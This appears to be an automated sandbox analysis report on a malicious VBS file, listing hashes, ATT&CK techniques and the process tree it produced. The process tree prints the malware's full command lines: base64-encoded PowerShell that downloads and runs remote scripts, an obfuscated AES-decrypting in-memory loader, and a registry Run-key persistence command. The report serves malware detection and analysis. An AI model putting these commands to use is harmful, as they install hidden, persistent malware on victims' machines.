a63181dff0f68b98712247f51c8a6e7761f8a84261928c297b12f438272c1492

General

Target

a63181dff0f68b98712247f51c8a6e7761f8a84261928c297b12f438272c1492.vbs
Size

1.6MB
MD5

7e0b7c6c89827a608664bf468d850933
SHA1

adcfcf643b371e24d79353f4f88231170229949f
SHA256

a63181dff0f68b98712247f51c8a6e7761f8a84261928c297b12f438272c1492
SHA512

ddfbaaaf6e7f06f5cbaa35e3b188064e71a6b4542185ecf71e0a89ed6411d98059c0b37b8ad3288b4029d5ddf870a3ad9f342fb521331ee1f39a2dad741778bd
SSDEEP

24576:PLOiXTUVNhZXj4TARZ3zRdIwEtiQXNosn/eYwv2FpZHFLKOJFErpvGcZqF:bINzTLgrSK/fJ7HpeYcy

Score

8^/10

discovery execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2824	powershell.exe
2112	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "C:\\Users\\Admin\\dwm.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2824	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2112	powershell.exe
2824	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	2824	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3060 wrote to memory of 1400	3060	WScript.exe	31
PID 3060 wrote to memory of 1400	3060	WScript.exe	31
PID 3060 wrote to memory of 1400	3060	WScript.exe	31
PID 1400 wrote to memory of 2160	1400	cmd.exe	33
PID 1400 wrote to memory of 2160	1400	cmd.exe	33
PID 1400 wrote to memory of 2160	1400	cmd.exe	33
PID 2160 wrote to memory of 2112	2160	cmd.exe	35
PID 2160 wrote to memory of 2112	2160	cmd.exe	35
PID 2160 wrote to memory of 2112	2160	cmd.exe	35
PID 2160 wrote to memory of 2652	2160	cmd.exe	36
PID 2160 wrote to memory of 2652	2160	cmd.exe	36
PID 2160 wrote to memory of 2652	2160	cmd.exe	36
PID 2160 wrote to memory of 2824	2160	cmd.exe	37
PID 2160 wrote to memory of 2824	2160	cmd.exe	37
PID 2160 wrote to memory of 2824	2160	cmd.exe	37
PID 2160 wrote to memory of 2824	2160	cmd.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a63181dff0f68b98712247f51c8a6e7761f8a84261928c297b12f438272c1492.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3060
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2112
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
      4⤵
      Adds Run key to start application
      PID:2652
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gaHliaHZnaHJ6bGVhbXd2cHZ6aW1xdWNsb2hiZHBpaGNtdmdqcm9vaSgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ1loYXQ4aGtCbHVnVzJyelF1OG1WVGhQRk5jUzJHZTRYNzNvWXNMeUU1L1E9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCdIZ01TMzMvSlFUdHVkNjROTXFMaVJ3PT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGR3d252YmFid3p1dmtpc252cHRuZWVicmRjbnJwbHhobGFqdXhvcW0oJHBhcmFtX3Zhcil7CUlFWCAnJGdhZ3FubXJlZHRuY3VhZHp2ZWpzb2psa2I9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckbWtqenhwaHpnaGV4a2Rya2lvdnh2bWt4aj1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJHpzZXh5d292cGFjaGZmZWdjb3R5Ymtic2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkZ2FncW5tcmVkdG5jdWFkenZlanNvamxrYiwgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkenNleHl3b3ZwYWNoZmZlZ2NvdHlia2JzaC5Db3B5VG8oJG1ranp4cGh6Z2hleGtkcmtpb3Z4dm1reGopOwkkenNleHl3b3ZwYWNoZmZlZ2NvdHlia2JzaC5EaXNwb3NlKCk7CSRnYWdxbm1yZWR0bmN1YWR6dmVqc29qbGtiLkRpc3Bvc2UoKTsJJG1ranp4cGh6Z2hleGtkcmtpb3Z4dm1reGouRGlzcG9zZSgpOwkkbWtqenhwaHpnaGV4a2Rya2lvdnh2bWt4ai5Ub0FycmF5KCk7fWZ1bmN0aW9uIGVxYmxxdnp1ZXljdmhlb2l0dmtva253eWFibnhyb3F1dHVqKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckZnZxbmdhem1weXdjYmlrcGJ2ZHBkZGlycXN5cXlpb3JtcXRieWlpYT1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGN2cWhoZWJmamphcHhkZWJuenduYmpuaGplcGxwanF0bWNuaG5iam1yc2hvaHp0amxyPSRmdnFuZ2F6bXB5d2NiaWtwYnZkcGRkaXJxc3lxeWlvcm1xdGJ5aWlhLkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGN2cWhoZWJmamphcHhkZWJuenduYmpuaGplcGxwanF0bWNuaG5iam1yc2hvaHp0amxyLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kaWFwZGh2aG5mbXV5b3pncXV4b2dyaWtnaCA9ICRlbnY6VVNFUk5BTUU7JGh3bWdyZmZueXZ2aGtlbnJld2RlemNjZmkgPSAnQzpcVXNlcnNcJyArICRpYXBkaHZobmZtdXlvemdxdXhvZ3Jpa2doICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkaHdtZ3JmZm55dnZoa2VucmV3ZGV6Y2NmaTskZGNncHo9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRod21ncmZmbnl2dmhrZW5yZXdkZXpjY2ZpKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkZHp4IGluICRkY2dweikgewlpZiAoJGR6eC5TdGFydHNXaXRoKCc6OicpKQl7CQkkZXRoeG49JGR6eC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kbWx6bWF4d2FydHdncnJoZmV5aG9xbmVpbHRwamJ6aG9heHE9W3N0cmluZ1tdXSRldGh4bi5TcGxpdCgnXCcpO0lFWCAnJG5zd2V1bmhpd21wbGtzam1rb216emhxYWdobXpybGlndGF1PWR3d252YmFid3p1dmtpc252cHRuZWVicmRjbnJwbHhobGFqdXhvcW0gKGh5Ymh2Z2hyemxlYW13dnB2emltcXVjbG9oYmRwaWhjbXZnanJvb2kgKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkbWx6bWF4d2FydHdncnJoZmV5aG9xbmVpbHRwamJ6aG9heHFbMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckbWl1bWFqZWl2d2llcnJueGFueHFmY3Z5bmFocWtkaXJqeHg9ZHd3bnZiYWJ3enV2a2lzbnZwdG5lZWJyZGNucnBseGhsYWp1eG9xbSAoaHliaHZnaHJ6bGVhbXd2cHZ6aW1xdWNsb2hiZHBpaGNtdmdqcm9vaSAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRtbHptYXh3YXJ0d2dycmhmZXlob3FuZWlsdHBqYnpob2F4cVsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtlcWJscXZ6dWV5Y3ZoZW9pdHZrb2tud3lhYm54cm9xdXR1aiAkbnN3ZXVuaGl3bXBsa3NqbWtvbXp6aHFhZ2htenJsaWd0YXUgJG51bGw7ZXFibHF2enVleWN2aGVvaXR2a29rbnd5YWJueHJvcXV0dWogJG1pdW1hamVpdndpZXJybnhhbnhxZmN2eW5haHFrZGlyanh4ICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
1.6MB

MD5
0f2d6e24c10a0c02a498acb09b8b25d0

SHA1
284ce989d3ba1af43591fa85147d591a11dd3720

SHA256
d2ca5cb28153f404d84cad9dd6b28725015527625a262d3b6471e0458f5ecb85

SHA512
449f0a9754804e6df9794ea58aa67b08bf72b8433619bb0c900e75d4b8e427a17680ffe01709c2ebe8e558db58c9edd0785ce43863a80b7148191f70f17c1d5f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BZKHHIJRRPPGP86M6RSO.temp

Filesize
7KB

MD5
e0d273fce0ca9773430b7b620051d97b

SHA1
ecd355cf1dc59398cfced91c9df771a14bf8ef91

SHA256
e3919a277a35ebad5e97b95bd5a77abe3923bc4891d3fc586aea058d3a1eaed4

SHA512
6a0c79f9012eb68ab7153a309e8ff6c5d5152e9ee9d24c1c9f1f4b1b54401879db216b2820b54319ca00d2d6ebea44c5f30921032c274deb8f4dd934007849d6

Download Submit
memory/2112-13-0x000007FEF5B7E000-0x000007FEF5B7F000-memory.dmp

Filesize
4KB

Download
memory/2112-16-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-15-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/2112-14-0x000000001B750000-0x000000001BA32000-memory.dmp

Filesize
2.9MB

Download
memory/2112-17-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-18-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-19-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-20-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads